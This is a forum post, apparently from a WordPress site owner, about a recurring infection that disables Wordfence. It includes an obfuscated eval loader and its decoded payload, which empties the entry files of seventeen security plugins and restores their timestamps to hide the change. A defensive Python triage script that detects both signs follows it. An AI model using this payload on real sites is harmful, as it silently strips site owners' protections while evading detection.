Malware Inject / Plugin disabled
Hi!
I’m dealing with a problem on a website. The Wordfence plugin suddenly became inaccessible or disabled without any reason. I found this inject inside one of my codes:

    $s = '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'; $d = 'base'. '6'.'4_d' .'eco' .'de';$o = $d($s);eval ( $o );

If you decode it, the code is self-explanatory:
    // Decoded payload (PHP, executed through eval). Resolve the site root
    // and the plugin directory.
    $dpath = isset($_SERVER["DOMAIN_PATH"]) ? $_SERVER["DOMAIN_PATH"] : $_SERVER["DOCUMENT_ROOT"];
    $d = $dpath . '/wp-content/plugins/';

    // Entry files of the security plugins the payload wants to neutralise.
    $f = array(
        $d . 'wordfence/wordfence.php',
        $d . 'wordfence/waf/bootstrap.php',
        $d . 'better-wp-security/better-wp-security.php',
        $d . 'sucuri-scanner/sucuri.php',
        $d . 'wp-security-audit-log/wp-security-audit-log.php',
        $d . 'total-security/total-security.php',
        $d . 'wp-hide-security-enhancer/wp-hide.php',
        $d . 'bulletproof-security/bulletproof-security.php',
        $d . 'wp-simple-firewall/icwp-wpsf.php',
        $d . 'wp-security-policy/wp-content-security-policy.php',
        $d . 'wp-cerber/wp-cerber.php',
        $d . 'defender-security/wp-defender.php',
        $d . 'security-ninja/security-ninja.php',
        $d . 'cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php',
        $d . 'ninjafirewall/ninjafirewall.php',
        $d . 'security-antivirus-firewall/index.php',
        $d . 'nfwplus/lib/firewall.php'
    );

    foreach ($f as $w) {
        if (is_file($w) && filesize($w) > 0) {
            // Remember the original mode and timestamps before touching the file.
            $perms = substr(sprintf("%o", fileperms($w)), -4);
            $stat = stat($w);
            if (!is_writable($w)) @chmod($w, 0644);
            // Truncate the plugin's entry file to zero bytes. With its code
            // (and plugin header) gone, WordPress no longer loads the plugin,
            // which is what shows up as "deactivated".
            fclose(fopen($w, 'w'));
            // Put the old mtime and mode back so the change does not stand out.
            @touch($w, $stat['mtime'], $stat['mtime']);
            @chmod($w, octdec($perms));
            clearstatcache();
        }
    }

The first code (without the manual base64 decoding) was not found by any of the above-listed plugins, nor by Wordfence.
I thought I cleaned all the site but suddenly I found wordfence deactivated again without any reason. What should I do?
Obviously, I have changed all the passwords/credentials and performed a full scan on the site.
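An added triage script (example code, not part of the original post and not Wordfence's or WordPress's own code) that checks for the two things the post describes: PHP files carrying the obfuscated loader, where `base64_decode` is spelled out as concatenated string fragments and the result is passed to `eval`, and security-plugin entry files that have been truncated to zero bytes while keeping their mtime. The detection is a heuristic (single-quoted fragments joined with `.` only), and the site tree it scans is constructed in a temp directory for the demonstration; the plugin path list is the one the decoded payload targets.

```python
"""Added example: triage helpers for the "zero out the security plugins" loader.

Two checks a responder would run:
  1. scan PHP files for the obfuscated base64_decode + eval loader, even when
     the function name is assembled from string fragments;
  2. list targeted plugin entry files that exist but are 0 bytes (the payload
     restores mtime and permissions, so file size is the remaining signal).
The demo site tree below is constructed here; it is not data from the post.
"""
import re
import tempfile
from pathlib import Path

# Entry files the decoded payload truncates (relative to wp-content/plugins/).
TARGETED_PLUGIN_FILES = [
    "wordfence/wordfence.php",
    "wordfence/waf/bootstrap.php",
    "better-wp-security/better-wp-security.php",
    "sucuri-scanner/sucuri.php",
    "wp-security-audit-log/wp-security-audit-log.php",
    "total-security/total-security.php",
    "wp-hide-security-enhancer/wp-hide.php",
    "bulletproof-security/bulletproof-security.php",
    "wp-simple-firewall/icwp-wpsf.php",
    "wp-security-policy/wp-content-security-policy.php",
    "wp-cerber/wp-cerber.php",
    "defender-security/wp-defender.php",
    "security-ninja/security-ninja.php",
    "cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php",
    "ninjafirewall/ninjafirewall.php",
    "security-antivirus-firewall/index.php",
    "nfwplus/lib/firewall.php",
]

# 'ab' . 'cd'  ->  'abcd'  (two adjacent single-quoted fragments joined by the dot operator)
_CONCAT_RE = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")
_EVAL_RE = re.compile(r"\beval\s*\(")
_DIRECT_RE = re.compile(r"\beval\s*\(\s*base64_decode\s*\(")
_VARIABLE_CALL_RE = re.compile(r"\$\w+\s*\(\s*\$\w+\s*\)")   # $d($s)


def join_string_fragments(src: str) -> str:
    """Collapse chained concatenations so 'base'.'6'.'4_d'.'eco'.'de' reads 'base64_decode'."""
    prev = None
    while prev != src:                      # repeat until no pair is left to join
        prev = src
        src = _CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src


def is_obfuscated_loader(src: str) -> bool:
    """Heuristic: eval() of base64_decode output, called directly or via a variable
    that holds the (fragment-assembled) function name."""
    norm = join_string_fragments(src)
    if not _EVAL_RE.search(norm):
        return False
    direct = _DIRECT_RE.search(norm) is not None
    indirect = "'base64_decode'" in norm and _VARIABLE_CALL_RE.search(norm) is not None
    return direct or indirect


def scan_php_tree(root: Path) -> list:
    """Return PHP files under root that match the loader heuristic."""
    hits = []
    for path in sorted(root.rglob("*.php")):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if is_obfuscated_loader(text):
            hits.append(path)
    return hits


def find_truncated_plugins(plugins_dir: Path) -> list:
    """Return targeted plugin entry files that are present but empty."""
    return [plugins_dir / rel for rel in TARGETED_PLUGIN_FILES
            if (plugins_dir / rel).is_file() and (plugins_dir / rel).stat().st_size == 0]


# Constructed samples: the loader with a harmless stand-in payload, and a clean file
# that uses base64 legitimately without eval.
LOADER_SAMPLE = ("<?php $s = 'cGhwaW5mbygpOw=='; "
                 "$d = 'base'. '6'.'4_d' .'eco' .'de';$o = $d($s);eval ( $o );")
CLEAN_SAMPLE = "<?php echo base64_encode('hello'); // no eval here\n"


def build_demo_site() -> Path:
    """Create a throwaway WordPress-like tree with one infected theme file and
    two zeroed Wordfence files (constructed for the demo)."""
    root = Path(tempfile.mkdtemp(prefix="wp_demo_"))
    plugins = root / "wp-content" / "plugins"
    (plugins / "wordfence" / "waf").mkdir(parents=True)
    (plugins / "wordfence" / "wordfence.php").write_text("")          # truncated
    (plugins / "wordfence" / "waf" / "bootstrap.php").write_text("")  # truncated
    (plugins / "akismet").mkdir()
    (plugins / "akismet" / "akismet.php").write_text("<?php // untouched plugin\n")
    (root / "wp-content" / "themes" / "demo").mkdir(parents=True)
    (root / "wp-content" / "themes" / "demo" / "functions.php").write_text(LOADER_SAMPLE)
    (root / "wp-config.php").write_text(CLEAN_SAMPLE)
    return root


def triage(root: Path) -> dict:
    """Run both checks and report site-relative paths."""
    plugins = root / "wp-content" / "plugins"
    return {
        "loaders": [p.relative_to(root).as_posix() for p in scan_php_tree(root)],
        "truncated": [p.relative_to(root).as_posix() for p in find_truncated_plugins(plugins)],
    }


if __name__ == "__main__":
    print(triage(build_demo_site()))
```

Run it against a real install by calling `triage(Path("/var/www/html"))` (or whatever the document root is). A loader hit tells you where the re-infection comes from; a zero-byte entry file with an old mtime is the fingerprint of this payload and will not be caught by a plugin that has just been emptied.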